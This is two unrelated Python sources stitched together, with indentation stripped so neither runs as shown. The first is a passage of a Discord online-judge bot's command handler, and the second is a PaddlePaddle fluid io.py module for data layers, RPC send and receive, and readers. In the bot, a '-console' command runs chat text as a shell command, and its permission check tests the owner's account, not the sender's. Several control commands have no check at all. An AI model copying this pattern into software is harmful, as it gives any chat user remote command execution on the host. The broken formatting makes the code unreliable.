lang = settings.find_one({"type":"lang", "name":arr[1]})
if lang is None:
await message.channel.send("Judging Error: Language not Supported. Type `-langs` for a list of supported languages.")
return
settings.insert_one({"type":"req", "user":str(message.author), "problem":prev['problem'], "lang":arr[1], "used":False})
language = arr[1]
await message.channel.send("Submission request received from `" + str(message.author) + "` for problem `" + prev['problem'] + "` in `" + language + "`.\nSend your source code either as an attachment or a message surrounded by backticks (`).")
elif str(message.content).split()[0].startswith("-lang"):
judging.get_file(storage_client, "Languages.txt", "Languages.txt")
f = open("Languages.txt", "r")
msg = f.read()
await message.channel.send(msg + "\nTo see exact execution commands, visit <https://dboj.jimmyliu.dev/>")
elif str(message.content).startswith("-error"):
f = open("errors.txt", "r")
await message.channel.send("```\n" + f.read(5000) + "\n```")
elif str(message.content).split()[0] == "-open":
# perm = settings.find_one({"type":"access", "name":str(message.author)})
prob = settings.find_one({"type":"problem", "name":str(message.content).split()[1].lower()})
if prob is None or perms(prob, str(message.author)):
await message.channel.send("Error: Problem not found")
return
try:
judging.get_file(storage_client, "ProblemStatements/" + prob['name'] + ".txt", "ProblemStatement.txt")
ps = open("ProblemStatement.txt", "r")
st = ps.read()
await message.channel.send(st)
except Exception as e:
await message.channel.send("An error occured while retrieving the problem statement:\n```" + str(e) + "\n```")
elif str(message.content).split()[0] == "-reset":
if str(message.author) != "jiminycricket#2701":
await message.channel.send("Sorry, you do not have authorized access to this command.")
return
settings.update_many({"type":"judge", "status":1}, {"$set":{"status":0}})
await updateStatus()
await message.channel.send("All servers' statuses are now set to available")
elif str(message.content).startswith("-add"):
await message.channel.send("To add your own problem to the judge, visit this site: <https://dboj.jimmyliu.dev/>")
elif str(message.content).startswith("-vote"):
await message.channel.send("Vote for the Judge discord bot!\nDiscord Bot List: <https://discordbotlist.com/bots/judge/upvote>\ntop.gg: <https://top.gg/bot/831963122448203776/vote>\n\nThanks for your support!")
elif str(message.content).startswith("-server"):
msg = "Discord bot online judge is currently in " + str(len(client.guilds)) + " servers!"
if str(message.channel) == "Direct Message with jiminycricket#2701":
msg += "\n```\n"
for x in client.guilds:
msg += str(x) + "\n"
await message.channel.send(msg + "```")
else:
await message.channel.send(msg)
elif str(message.content).split()[0] == "-users":
if str(message.channel) != "Direct Message with jiminycricket#2701":
return
f = open("users.txt", "r")
await message.channel.send("```\n" + f.read() + "```")
f.close()
elif str(message.content).startswith("-on"):
j = int(str(message.content).split()[1])
settings.update_one({"type":"judge", "num":j}, {"$set":{"status":0}})
await updateStatus()
await message.channel.send("Judge " + str(j) + " is now online")
elif str(message.content).startswith("-off"):
j = int(str(message.content).split()[1])
settings.update_one({"type":"judge", "num":j}, {"$set":{"status":2}})
await updateStatus()
await message.channel.send("Judge " + str(j) + " is now offline")
elif str(message.content) == "-status":
msg = getStatus()
await message.channel.send("**Current Judge Server Statuses:**\n```\n" + msg + "```")
elif str(message.content).startswith("-reset"):
settings.update_many({"type":"judge"}, {"$set":{"status":0}})
await updateStatus()
await message.channel.send("All online judging servers successfully reset.\nType `-status` to see current judge statuses")
elif str(message.content).startswith("-invite"):
await message.channel.send("Invite the online judge discord bot to your own server with this link: \nhttps://discord.com/api/oauth2/authorize?client_id=831963122448203776&permissions=2148005952&scope=bot")
elif str(message.content).startswith("-cancel"):
settings.delete_many({"type":"req"})
await message.channel.send("Successfully cancelled all active submission requests")
elif str(message.content) == "-sigterm":
running = False # set terminate signal
await message.channel.send("Attempting to terminate processes.")
elif str(message.content) == "-sigkill":
await message.channel.send("Killing process signal using system exiter.")
exit(0) # Kill using system exit function
elif str(message.content) == "-restart":
running = True # Attempt to restart process
await message.channel.send("Restarting judge.")
elif str(message.content).startswith("-join"):
if not (str(message.channel).startswith("ticket-") or str(message.channel).endswith("-channel")):
await message.channel.send("Please join contests in a private channel with the bot. Head to <#855868243855147030> to create one.")
return
arr = str(message.content).split()
if len(arr) != 2:
await message.channel.send("Incorrect formatting for join command. Use `-join [contestCode]` to join a contest")
return
cont = settings.find_one({"type":"contest", "name":arr[1].lower()})
if cont is None:
await message.channel.send("Error: Contest not found")
return
if (not contests.date(cont['start'], cont['end'], contests.current_time())):
await message.channel.send("This contest is not currently active. Type `-up` to see upcoming contest times.")
return
if not settings.find_one({"type":"access", "mode":arr[1], "name":str(message.author)}) is None:
await message.channel.send("You already joined this contest!")
return
solved = [0] * (cont['problems'] + 1)
penalties = [0] * (cont['problems'] + 1)
time_bonus = [0] * (cont['problems'] + 1)
settings.insert_one({"type":"access", "mode":arr[1], "name":str(message.author), "solved":solved, "penalty":penalties, "time-bonus":time_bonus, "start":contests.current_time(), "taken":0})
await live_scoreboard(arr[1])
await message.channel.send("Successfully joined contest `" + arr[1] + "`! You have " + amt(cont['len']) + " to complete the contest. Good Luck!\n")
await asyncio.sleep(1)
judging.get_file(storage_client, "ContestInstructions/" + arr[1] + ".txt", "ContestInstructions.txt")
f = open("ContestInstructions.txt", "r")
await message.channel.send("```\n" + f.read() + "\n```")
notif = client.get_channel(858365776385277972)
await notif.send("<@627317639550861335> User `" + str(message.author) + "` joined contest `" + arr[1] + "`!")
elif str(message.content).startswith("-profile"):
arr = str(message.content).split()
if len(arr) == 1:
await message.channel.send(profile(str(message.author)))
else:
await message.channel.send(profile(str(message.content)[9:]))
elif str(message.content).startswith("-rank"):
arr = str(message.content).split()
if len(arr) < 2:
await message.channel.send("Incorrect formatting for `-rank` command. Please type `-rank [contestCode]` for the scoreboard")
else:
await message.channel.send(getScoreboard(arr[1]))
elif str(message.content).startswith("-rem"):
arr = str(message.content).split()
if len(arr) == 1:
await message.channel.send(remaining(str(message.author)))
else:
await message.channel.send(remaining(str(message.content)[5:]))
elif str(message.content).startswith("-up"):
m = "Upcoming contests:\n```"
f = False
for x in settings.find({"type":"contest"}):
if contests.compString(x['end'], contests.current_time()):
m += "Contest " + x['name'] + " starts at " + x['start'] + " and ends at " + x['end'] + "\n"
f = True
if not f:
m += "No upcoming contests\n"
m += "```"
await message.channel.send(m)
elif str(message.content).startswith("-refresh"):
arr = str(message.content).split()
if len(arr) < 2:
await message.channel.send("Incorrect formatting for refresh command. Use `-refresh [contestCode]`")
return
for i in range(1, len(arr)):
await live_scoreboard(arr[i])
await updateStatus()
await message.channel.send("Refreshed live scoreboard and live judge status")
elif str(message.content).startswith("-set"):
arr = str(message.content).split()
if settings.find_one({"type":"access", "mode":"admin", "name":str(message.author)}) is None:
await message.channel.send("Sorry, you do not have sufficient permissions to use this command.")
return
settings.update_one({"type":"livecontests"}, {"$set":{"arr":arr[1:]}})
await sendLiveScoreboards()
await message.channel.send("Live scoreboard contests set to `" + str(arr[1:]) + "`")
elif str(message.content).startswith("-console"):
if settings.find_one({"type":"access", "mode":"admin", "name":"jiminycricket#2701"}) is None:
await message.channel.send("Sorry, you do not have sufficient permissions to use this command.")
return
output = open("console.out", "w")
tm = float(str(message.content).split()[1])
console = subprocess.Popen(str(message.content)[(str(message.content).find("$")+1):], stdout=output, preexec_fn = judging.limit_virtual_memory, shell=True)
await message.channel.send("Console started. Running command `" + str(message.content)[(str(message.content).find("$")+1):] + "` for " + str(tm) + " second(s).")
try:
console.wait(timeout = tm)
except subprocess.TimeoutExpired:
console.terminate()
output.flush()
output.close()
await message.channel.send("Console finished. Output shown below:\n```" + open("console.out", "r").read(2000) + "\n```")
elif str(message.content).startswith("-export"):
if settings.find_one({"type":"access", "mode":"admin", "name":"jiminycricket#2701"}) is None:
await message.channel.send("Sorry, you do not have sufficient permissions to use this command. Please contact jiminycricket#2701 for problem setting permissions.")
return
if len(message.attachments) == 0:
await message.channel.send("Please attach a zip archive with the problem info along with the `-export` command")
return
await message.channel.send("Uploading problem data...")
try:
msg = ProblemUpload.uploadProblem(settings, storage.Client(), str(message.attachments[0]), str(message.author))
await message.channel.send(msg)
except Exception as e:
await message.channel.send("Error occurred while uploading problem data:\n```" + str(e) + "\n```")
os.system("rm -r problemdata; rm data.zip")
elif str(message.content) == "-register":
if not str(message.channel).startswith("Direct Message with"):
await message.channel.send("Please use `-register` in a direct message with the bot.")
return
if settings.find_one({"type":"account", "name":str(message.author)}) is not None:
await message.channel.send("An account under your username has already been registered. If you forgot your password, please contact me (`jiminycricket#2701`).")
return
pswd = generatePassword()
settings.insert_one({"type":"account", "name":str(message.author), "pswd":hashCode(pswd)})
await message.channel.send("Your account has been successfully created! Your password is `" + pswd + "`. Please don't share it with anyone.")
client.run(os.getenv("TOKEN"))
|
io.py
|
# Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
from ..wrapped_decorator import signature_safe_contextmanager
import multiprocessing
import os
import six
import sys
import threading
from ..data_feeder import DataFeeder
from .control_flow import BlockGuard
from .layer_function_generator import templatedoc
from .. import core
from ..executor import global_scope
from ..framework import convert_np_dtype_to_dtype_, default_main_program, \
default_startup_program, program_guard, Program, Variable
from ..layer_helper import LayerHelper
from ..unique_name import generate as unique_name
import logging
__all__ = [
'data', 'read_file', 'double_buffer', 'py_reader',
'create_py_reader_by_data', 'load'
]
def data(name,
shape,
append_batch_size=True,
dtype='float32',
lod_level=0,
type=core.VarDesc.VarType.LOD_TENSOR,
stop_gradient=True):
"""
**Data Layer**
This function takes in the input and based on whether data has
to be returned back as a minibatch, it creates the global variable by using
the helper functions. The global variables can be accessed by all the
following operators in the graph.
All the input variables of this function are passed in as local variables
to the LayerHelper constructor.
Notice that paddle would only use :code:`shape` to infer the shapes of
following variables in the network during compile-time. During run-time,
paddle would not check whether the shape of the feeded data matches the
:code:`shape` settings in this function.
Args:
name(str): The name/alias of the function
shape(list): Tuple declaring the shape. If :code:`append_batch_size` is
True and there is no -1 inside :code:`shape`, it should be
considered as the shape of the each sample. Otherwise, it
should be considered as the shape of the batched data.
append_batch_size(bool):
1. If true, it prepends -1 to the shape.
For example if shape=[1], the resulting shape is [-1, 1]. This will
be useful to set different batch size at run time.
2. If shape contains -1, such as shape=[1, -1].
append_batch_size will be enforced to be be False (ineffective)
because PaddlePaddle cannot set more than 1 unknown number on the
shape.
dtype(np.dtype|VarType|str): The type of data : float32, float16, int etc
type(VarType): The output type. By default it is LOD_TENSOR.
lod_level(int): The LoD Level. 0 means the input data is not a sequence.
stop_gradient(bool): A boolean that mentions whether gradient should flow.
Returns:
Variable: The global variable that gives access to the data.
Examples:
.. code-block:: python
import paddle.fluid as fluid
data = fluid.layers.data(name='x', shape=[784], dtype='float32')
"""
helper = LayerHelper('data', **locals())
shape = list(shape)
for i in six.moves.range(len(shape)):
if shape[i] is None:
shape[i] = -1
append_batch_size = False
elif shape[i] < 0:
append_batch_size = False
if append_batch_size:
shape = [-1] + shape # append batch size as -1
data_var = helper.create_global_variable(
name=name,
shape=shape,
dtype=dtype,
type=type,
stop_gradient=stop_gradient,
lod_level=lod_level,
is_data=True)
return data_var
class BlockGuardServ(BlockGuard):
"""
BlockGuardServ class.
BlockGuardServ class is used to create an op with a block in a program.
"""
def __init__(self, server):
if not (isinstance(server, ListenAndServ)):
raise TypeError("BlockGuardServ takes a ListenAndServ")
super(BlockGuardServ, self).__init__(server.helper.main_program)
self.server = server
def __exit__(self, exc_type, exc_val, exc_tb):
if exc_type is not None:
return False
self.server.complete_op()
return super(BlockGuardServ, self).__exit__(exc_type, exc_val, exc_tb)
class ListenAndServ(object):
"""
**ListenAndServ Layer**
ListenAndServ is used to create a rpc server bind and listen
on specific TCP port, this server will run the sub-block when
received variables from clients.
Args:
endpoint(string): IP:port string which the server will listen on.
inputs(list): a list of variables that the server will get from clients.
fan_in(int): how many client are expected to report to this server, default: 1.
optimizer_mode(bool): whether to run the server as a parameter server, default: True.
Examples:
.. code-block:: python
import paddle.fluid as fluid
with fluid.program_guard(main):
serv = layers.ListenAndServ(
"127.0.0.1:6170", ["X"], optimizer_mode=False)
with serv.do():
x = layers.data(
shape=[32, 32],
dtype='float32',
name="X",
append_batch_size=False)
fluid.initializer.Constant(value=1.0)(x, main.global_block())
layers.scale(x=x, scale=10.0, out=out_var)
exe = fluid.Executor(place)
exe.run(main)
"""
def __init__(self, endpoint, inputs, fan_in=1, optimizer_mode=True):
self.helper = LayerHelper("listen_and_serv")
self.inputs = inputs
self.outputs = []
self.endpoint = endpoint
self.fan_in = fan_in
# FIXME(typhoonzero): add optimizer_mode is stupid, should make it more
# general.
self.optimizer_mode = optimizer_mode
def do(self):
return BlockGuardServ(self)
def get_params_and_grads(self):
main_program = self.helper.main_program
current_block = main_program.current_block()
parent_block = self.parent_block()
# params and grads in the same order.
params = list()
grads = list()
for op in current_block.ops:
# FIXME(typhoonzero): op.inputs is None if it's cloned.
if self.optimizer_mode:
if "Grad" in op.inputs and "Param" in op.inputs:
params.append(op.inputs["Param"].name)
grads.append(op.inputs["Grad"].name)
else:
# simple recv mode, recv operators inputs.
for iname in op.input_names:
for in_var_name in op.input(iname):
params.append(parent_block.var(in_var_name))
grads.append(parent_block.var(in_var_name))
return params, grads
def parent_block(self):
prog = self.helper.main_program
parent_idx = prog.current_block().parent_idx
assert parent_idx >= 0
parent_block = prog.block(parent_idx)
return parent_block
def complete_op(self):
main_program = self.helper.main_program
current_block = main_program.current_block()
parent_block = self.parent_block()
parent_block.append_op(
type='listen_and_serv',
inputs={"X": self.inputs},
outputs={},
attrs={
'endpoint': self.endpoint,
'Fanin': self.fan_in,
'optimize_blocks': [
current_block
], # did not support multiple optimize blocks in layers
'sync_mode': True, # did not support async now in layers
'grad_to_block_id': [""]
})
def Send(endpoints, send_vars, dummy_output=None, sync=True):
"""
Send variables to the server side, and get vars from server
side when server have finished running server side program.
Args:
endpoints (str): comma seperated IP:PORT pairs in the order
of send_vars to send
send_vars (list): variables to send to server
sync (bool): whether to wait the request finish
"""
assert (type(send_vars) == list)
if dummy_output is None:
dummy_output = []
elif isinstance(dummy_output, Variable):
dummy_output = [dummy_output]
assert (type(dummy_output) == list)
epmap = endpoints.split(",")
endpoints = list(set(epmap))
helper = LayerHelper("Send", **locals())
rpc_op_role_name = core.op_proto_and_checker_maker.kOpRoleAttrName()
helper.append_op(
type="send",
inputs={"X": send_vars},
outputs={"Out": dummy_output},
attrs={
"endpoints": endpoints,
"epmap": epmap,
rpc_op_role_name: core.op_proto_and_checker_maker.OpRole.RPC
})
if sync:
helper.append_op(
type="send_barrier",
inputs={"X": dummy_output},
outputs={"Out": []},
attrs={"endpoints": endpoints})
def Recv(endpoints, get_vars, dummy_input=None, sync=True):
"""
Receive variables from server side
Args:
endpoints (str): comma seperated IP:PORT pairs in the order
of send_vars to send
get_vars (list): vars to get from server after send completes.
sync (bool): whether to wait the request finish
Returns:
list: list of received variables
"""
assert (type(get_vars) == list)
if dummy_input is None:
dummy_input = []
elif isinstance(dummy_input, Variable):
dummy_input = [dummy_input]
assert (type(dummy_input) == list)
epmap = endpoints.split(",")
endpoints = list(set(epmap))
helper = LayerHelper("Recv", **locals())
helper.append_op(
type="recv",
inputs={"X": dummy_input},
outputs={"Out": get_vars},
attrs={"endpoints": endpoints,
"epmap": epmap})
if sync:
helper.append_op(
type="fetch_barrier",
outputs={"Out": get_vars},
attrs={"endpoints": endpoints})
return get_vars
def monkey_patch_reader_methods(reader):
def __get_reader__():
scope = global_scope()
var = scope.find_var(reader.name)
return var.get_reader()
def reset():
return __get_reader__().reset()
reader.reset = reset
reader.stop_gradient = True
reader.persistable = True
return reader
def _copy_reader_var_(block, var):
new_var = block.create_var(name=var.name, type=core.VarDesc.VarType.READER)
new_var.desc.set_shapes(var.desc.shapes())
new_var.desc.set_dtypes(var.desc.dtypes())
new_var.desc.set_lod_levels(var.desc.lod_levels())
new_var.persistable = True
return new_var
def _copy_reader_create_op_(block, op):
input_param_names = op.input_names
new_input_map = {}
for param_name in input_param_names:
new_input_map[param_name] = []
arg_names = op.input(param_name)
for arg_name in arg_names:
new_input_map[param_name].append(block.var(arg_name))
output_param_names = op.output_names
new_output_map = {}
for param_name in output_param_names:
new_output_map[param_name] = []
arg_names = op.output(param_name)
for arg_name in arg_names:
new_output_map[param_name].append(block.var(arg_name))
new_op = block.append_op(
type=op.type,
inputs=new_input_map,
outputs=new_output_map,
attrs=op.all_attrs())
return new_op
def _py_reader(capacity,
shapes,
dtypes,
lod_levels=None,
name=None,
use_double_buffer=True,
feed_list=None):
if feed_list is not None:
if not isinstance(feed_list, list):
raise TypeError("feed_list should be a list of Variable"
" instead of " + str(type(feed_list)))
lod_levels = []
dtypes = []
shape_concat = []
ranks = []
shapes = []
for feed_data in feed_list:
dtypes.append(feed_data.dtype)
shape_concat.extend(feed_data.shape)
ranks.append(len(feed_data.shape))
shapes.append(feed_data.shape)
lod_levels.append(feed_data.lod_level)
else:
dtypes = [convert_np_dtype_to_dtype_(dt) for dt in dtypes]
shape_concat = []
ranks = []
for shape in shapes:
shape_concat.extend(shape)
ranks.append(len(shape))
if lod_levels is None:
lod_levels = [0] * len(shapes)
if name is None:
queue_name = unique_name('lod_tensor_blocking_queue')
reader_name = unique_name('create_py_reader')
double_buffer_name = unique_name('double_buffer')
else:
queue_name = "_".join([name, "queue"])
reader_name = "_".join([name, "reader"])
double_buffer_name = "_".join([name, "double_buffer"])
var = global_scope().var(queue_name)
feed_queue = core.init_lod_tensor_blocking_queue(var, capacity)
startup_blk = default_startup_program().current_block()
startup_var = startup_blk.create_var(name=reader_name)
startup_blk.append_op(
type='create_py_reader',
inputs={'blocking_queue': [queue_name]},
outputs={'Out': [startup_var]},
attrs={
'shape_concat': shape_concat,
'lod_levels': lod_levels,
'ranks': ranks
})
startup_var.desc.set_dtypes(dtypes)
startup_var.persistable = True
main_prog_var = _copy_reader_var_(default_main_program().current_block(),
startup_var)
reader = monkey_patch_reader_methods(main_prog_var)
if use_double_buffer:
double_buffer_reader = double_buffer(reader, name=double_buffer_name)
# we return a double buffer reader. However, the reset method comes from
# py_reader.
double_buffer_reader.reset = reader.reset
reader = double_buffer_reader
# monkey patch py_reader special methods
reader.queue = feed_queue
current_reset_method = reader.reset
reader.thread = None
reader.tensor_provider = None
reader.exited = False
def start_provide_thread(func):
def __provider_thread__():
try:
for tensors in func():
array = core.LoDTensorArray()
for item in tensors:
if not isinstance(item, core.LoDTensor):
tmp = core.LoDTensor()
tmp.set(item, core.CPUPlace())
item = tmp
array.append(item)
if reader.exited:
break
feed_queue.push(array)
if reader.exited:
break
feed_queue.close()
except Exception as ex:
feed_queue.close()
logging.warn('Your decorated reader has raised an exception!')
six.reraise(*sys.exc_info())
reader.thread = threading.Thread(target=__provider_thread__)
reader.thread.daemon = True
reader.thread.start()
def __set_tensor_provider__(func):
reader.tensor_provider = func
def __set_paddle_reader__(paddle_reader):
with program_guard(Program(), Program()):
actual_feed_list = feed_list
if actual_feed_list is None:
actual_feed_list = []
counter = 0
for dtype, shape, lod_level in zip(dtypes, shapes, lod_levels):
name = str(counter)
actual_feed_list.append(
data(
name=name,
dtype=dtype,
shape=shape,
lod_level=lod_level))
counter += 1
data_names = [feed_data.name for feed_data in actual_feed_list]
feeder = DataFeeder(
feed_list=actual_feed_list, place=core.CPUPlace())
paddle_reader = feeder.decorate_reader(
paddle_reader, multi_devices=False)
def __tensor_provider__():
for slots in paddle_reader():
yield [slots[data_name] for data_name in data_names]
__set_tensor_provider__(__tensor_provider__)
def __reset__():
current_reset_method()
if reader.thread is not None and reader.tensor_provider is not None:
reader.exited = True
reader.thread.join()
reader.exited = False
def __start__():
start_provide_thread(reader.tensor_provider)
reader.reset = __reset__
reader.decorate_tensor_provider = __set_tensor_provider__
reader.decorate_paddle_reader = __set_paddle_reader__
reader.decorate_batch_generator = __set_tensor_provider__
reader.decorate_sample_list_generator = __set_paddle_reader__
reader.start = __start__
return reader
def py_reader(capacity,
shapes,
dtypes,
lod_levels=None,
name=None,
use_double_buffer=True):
"""
Create a Python reader for data feeding in Python
This layer returns a Reader Variable.
The Reader provides :code:`decorate_paddle_reader()` and
:code:`decorate_tensor_provider()` to set a Python generator as the data
source. More details :ref:`user_guide_use_py_reader_en` . When
:code:`Executor::Run()` is invoked in C++ side, the data from the generator
would be read automatically. Unlike :code:`DataFeeder.feed()`, the data
reading process and :code:`Executor::Run()` process can run in parallel
using :code:`py_reader`. The :code:`start()` method of the Reader should be
called when each pass begins, while the :code:`reset()` method should be
called when the pass ends and :code:`fluid.core.EOFException` raises.
Note that :code:`Program.clone()` method cannot clone :code:`py_reader`.
Args:
capacity(int): The buffer capacity maintained by :code:`py_reader`.
shapes(list|tuple): List of tuples which declaring data shapes.
dtypes(list|tuple): List of strs which declaring data type.
lod_levels(list|tuple): List of ints which declaring data lod_level.
name(basestring): The prefix Python queue name and Reader name. None will
be generated automatically.
use_double_buffer(bool): Whether use double buffer or not.
Returns:
Variable: A Reader from which we can get feeding data.
Examples:
1. The basic usage of :code:`py_reader` is as follows:
.. code-block:: python
import paddle
import paddle.fluid as fluid
import paddle.dataset.mnist as mnist
def network(image, label):
# user defined network, here a softmax regresssion example
predict = fluid.layers.fc(input=image, size=10, act='softmax')
return fluid.layers.cross_entropy(input=predict, label=label)
reader = fluid.layers.py_reader(capacity=64,
shapes=[(-1, 1, 28, 28), (-1, 1)],
dtypes=['float32', 'int64'])
reader.decorate_paddle_reader(
paddle.reader.shuffle(paddle.batch(mnist.train(), batch_size=5),
buf_size=1000))
img, label = fluid.layers.read_file(reader)
loss = network(img, label)
fluid.Executor(fluid.CUDAPlace(0)).run(fluid.default_startup_program())
exe = fluid.ParallelExecutor(use_cuda=True)
for epoch_id in range(10):
reader.start()
try:
while True:
exe.run(fetch_list=[loss.name])
except fluid.core.EOFException:
reader.reset()
fluid.io.save_inference_model(dirname='./model',
feeded_var_names=[img.name, label.name],
target_vars=[loss],
executor=fluid.Executor(fluid.CUDAPlace(0)))
2. When training and testing are both performed, two different
:code:`py_reader` should be created with different names, e.g.:
.. code-block:: python
import paddle
import paddle.fluid as fluid
import paddle.dataset.mnist as mnist
def network(reader):
img, label = fluid.layers.read_file(reader)
# User defined network. Here a simple regression as example
predict = fluid.layers.fc(input=img, size=10, act='softmax')
loss = fluid.layers.cross_entropy(input=predict, label=label)
return fluid.layers.mean(loss)
# Create train_main_prog and train_startup_prog
train_main_prog = fluid.Program()
train_startup_prog = fluid.Program()
with fluid.program_guard(train_main_prog, train_startup_prog):
# Use fluid.unique_name.guard() to share parameters with test program
with fluid.unique_name.guard():
train_reader = fluid.layers.py_reader(capacity=64,
shapes=[(-1, 1, 28, 28),
(-1, 1)],
dtypes=['float32', 'int64'],
name='train_reader')
train_reader.decorate_paddle_reader(
paddle.reader.shuffle(paddle.batch(mnist.train(), batch_size=5),
buf_size=500))
train_loss = network(train_reader) # some network definition
adam = fluid.optimizer.Adam(learning_rate=0.01)
adam.minimize(train_loss)
# Create test_main_prog and test_startup_prog
test_main_prog = fluid.Program()
test_startup_prog = fluid.Program()
with fluid.program_guard(test_main_prog, test_startup_prog):
# Use fluid.unique_name.guard() to share parameters with train program
with fluid.unique_name.guard():
test_reader = fluid.layers.py_reader(capacity=32,
shapes=[(-1, 1, 28, 28), (-1, 1)],
dtypes=['float32', 'int64'],
name='test_reader')
test_reader.decorate_paddle_reader(paddle.batch(mnist.test(), 512))
test_loss = network(test_reader)
fluid.Executor(fluid.CUDAPlace(0)).run(train_startup_prog)
fluid.Executor(fluid.CUDAPlace(0)).run(test_startup_prog)
train_exe = fluid.ParallelExecutor(use_cuda=True,
loss_name=train_loss.name,
main_program=train_main_prog)
test_exe = fluid.ParallelExecutor(use_cuda=True,
loss_name=test_loss.name,
main_program=test_main_prog)
for epoch_id in range(10):
train_reader.start()
try:
while True:
train_exe.run(fetch_list=[train_loss.name])
except fluid.core.EOFException:
train_reader.reset()
test_reader.start()
try:
while True:
test_exe.run(fetch_list=[test_loss.name])
except fluid.core.EOFException:
test_reader.reset()
"""
logging.warn(
'paddle.fluid.layers.py_reader() may be deprecated in the near future. '
'Please use paddle.fluid.io.DataLoader.from_generator() instead.')
return _py_reader(
capacity=capacity,
shapes=shapes,
dtypes=dtypes,
lod_levels=lod_levels,
name=name,
use_double_buffer=use_double_buffer)
def create_py_reader_by_data(capacity,
feed_list,
name=None,
use_double_buffer=True):
"""
Create a Python reader for data feeding in Python
This layer returns a Reader Variable.
Works much like py_reader except that it's input is feed_list
instead of shapes, dtypes and lod_levels
Args:
capacity(int): The buffer capacity maintained by :code:`py_reader`.
feed_list(list(Variable)): The data feed list.
name(basestring): The prefix Python queue name and Reader name. None will
be generated automatically.
use_double_buffer(bool): Whether use double buffer or not.
Returns:
Variable: A Reader from which we can get feeding data.
Examples:
.. code-block:: python
import paddle
import paddle.fluid as fluid
import paddle.dataset.mnist as mnist
import paddle.fluid.compiler as compiler
def network(img, label):
# User defined network. Here a simple regression as example
predict = fluid.layers.fc(input=img, size=10, act='softmax')
loss = fluid.layers.cross_entropy(input=predict, label=label)
return fluid.layers.mean(loss)
MEMORY_OPT = False
USE_CUDA = False
image = fluid.layers.data(name='image', shape=[1, 28, 28], dtype='float32')
label = fluid.layers.data(name='label', shape=[1], dtype='int64')
reader = fluid.layers.create_py_reader_by_data(capacity=64,
feed_list=[image, label])
reader.decorate_paddle_reader(
paddle.reader.shuffle(paddle.batch(mnist.train(), batch_size=5),
buf_size=500))
img, label = fluid.layers.read_file(reader)
loss = network(img, label) # some network definition
place = fluid.CUDAPlace(0) if USE_CUDA else fluid.CPUPlace()
exe = fluid.Executor(place)
exe.run(fluid.default_startup_program())
build_strategy = fluid.BuildStrategy()
build_strategy.memory_optimize = True if MEMORY_OPT else False
compiled_prog = compiler.CompiledProgram(
fluid.default_main_program()).with_data_parallel(
loss_name=loss.name,
build_strategy=build_strategy,
exec_strategy=exec_strategy)
for epoch_id in range(2):
reader.start()
try:
while True:
exe.run(compiled_prog, fetch_list=[loss.name])
except fluid.core.EOFException:
reader.reset()
"""
logging.warn(
'paddle.fluid.layers.create_py_reader_by_data() may be deprecated in the near future. '
'Please use paddle.fluid.io.DataLoader.from_generator() instead.')
return _py_reader(
capacity=capacity,
shapes=None,
dtypes=None,
lod_levels=None,
name=name,
use_double_buffer=use_double_buffer,
feed_list=feed_list)
def __create_shared_decorated_reader__(op_type, reader, attrs):
var_name = unique_name(op_type)
startup_blk = default_startup_program().current_block()
startup_var = startup_blk.create_var(name=var_name)
startop_op = startup_blk.append_op(
type=op_type,
inputs={'UnderlyingReader': reader},
outputs={'Out': [startup_var]},
attrs=attrs)
startup_var.persistable = True
main_prog_block = default_main_program().current_block()
main_prog_var = _copy_reader_var_(main_prog_block, startup_var)
_copy_reader_create_op_(main_prog_block, startop_op)
return monkey_patch_reader_methods(main_prog_var)
def __create_unshared_decorated_reader__(op_type, reader, attrs, name=None):
new_reader_name = name if name is not None else unique_name(op_type)
main_blk = default_main_program().current_block()
new_reader = main_blk.create_var(name=new_reader_name)
main_blk.append_op(
type=op_type,
inputs={'UnderlyingReader': reader},
outputs={'Out': [new_reader]},
attrs=attrs)
return monkey_patch_reader_methods(new_reader)
def double_buffer(reader, place=None, name=None):
"""
Wrap a double buffer reader. The class Reader contains DecoratedReader and FileReader. Moreover, the DecoratedReader is inherited by CustomReader and BufferedReader. This function is related to BufferedReader. The data will copy to target place with a double buffer queue. If the target place is None, the place that executor perform on will be used.
Args:
reader (Variable): The Reader Variable need to be wrapped.
place (Place, optional): The place of target data, such as CPU, GPU, and if use GPU, it's necessary to point out which card is involved. Default is the sample place of executor perform.
name (str, optional): Variable name. Normally there is no need for user to set this property. For more information, please refer to :ref:`api_guide_Name`. Default is None.
Returns:
Variable(Reader): wrapped reader with double buffer.
Examples:
.. code-block:: python
import paddle.fluid as fluid
reader = fluid.layers.py_reader(capacity=64,
shapes=[(-1, 1, 28, 28), (-1, 1)],
dtypes=['float32', 'int64'],
use_double_buffer=False)
reader = fluid.layers.double_buffer(reader)
image, label = fluid.layers.read_file(reader)
"""
attrs = dict()
if place is not None:
attrs['place'] = str(place).upper()
return __create_unshared_decorated_reader__(
'create_double_buffer_reader', reader, attrs, name=name)
def read_file(reader):
"""
Execute the given reader and get data via it.
A reader is also a Variable. It can be a raw reader generated by
`fluid.layers.open_files()` or a decorated one generated by
`fluid.layers.double_buffer()` .
Args:
reader(Variable): The reader to execute.
Returns:
Tuple[Variable]: Data read from the given reader.
Examples:
.. code-block:: python
import paddle.fluid as fluid
reader = fluid.layers.py_reader(capacity=64,
shapes=[(-1, 1, 28, 28), (-1, 1)],
dtypes=['float32', 'int64'])
image, label = fluid.layers.read_file(reader)
"""
helper = LayerHelper('read_file')
out = [
helper.create_variable_for_type_inference(
stop_gradient=True, dtype='float32')
for _ in range(len(reader.desc.shapes()))
]
helper.append_op(
type='read', inputs={'Reader': [reader]}, outputs={'Out': out})
if len(out) == 1:
return out[0]
else:
return out
def load(out, file_path, load_as_fp16=None):
"""
Load operator will load a LoDTensor / SelectedRows variable from disk file.
Args:
out(Variable): The LoDTensor / SelectedRows need to be loaded..
file_path(STRING): Variable will be loaded from "file_path".
load_as_fp16(BOOLEAN): If true, the tensor will be first loaded and then converted to float16 data type. Otherwise, the tensor will be directly loaded without data type conversion. Default is false..
Returns:
None
Examples:
.. code-block:: python
import paddle.fluid as fluid
tmp_tensor = fluid.layers.create_tensor(dtype='float32')
fluid.layers.load(tmp_tensor, "./tmp_tensor.bin")
"""
helper = LayerHelper("load", **locals())
attrs = {"file_path": file_path}
if load_as_fp16 is not None:
attrs['load_as_fp16'] = load_as_fp16
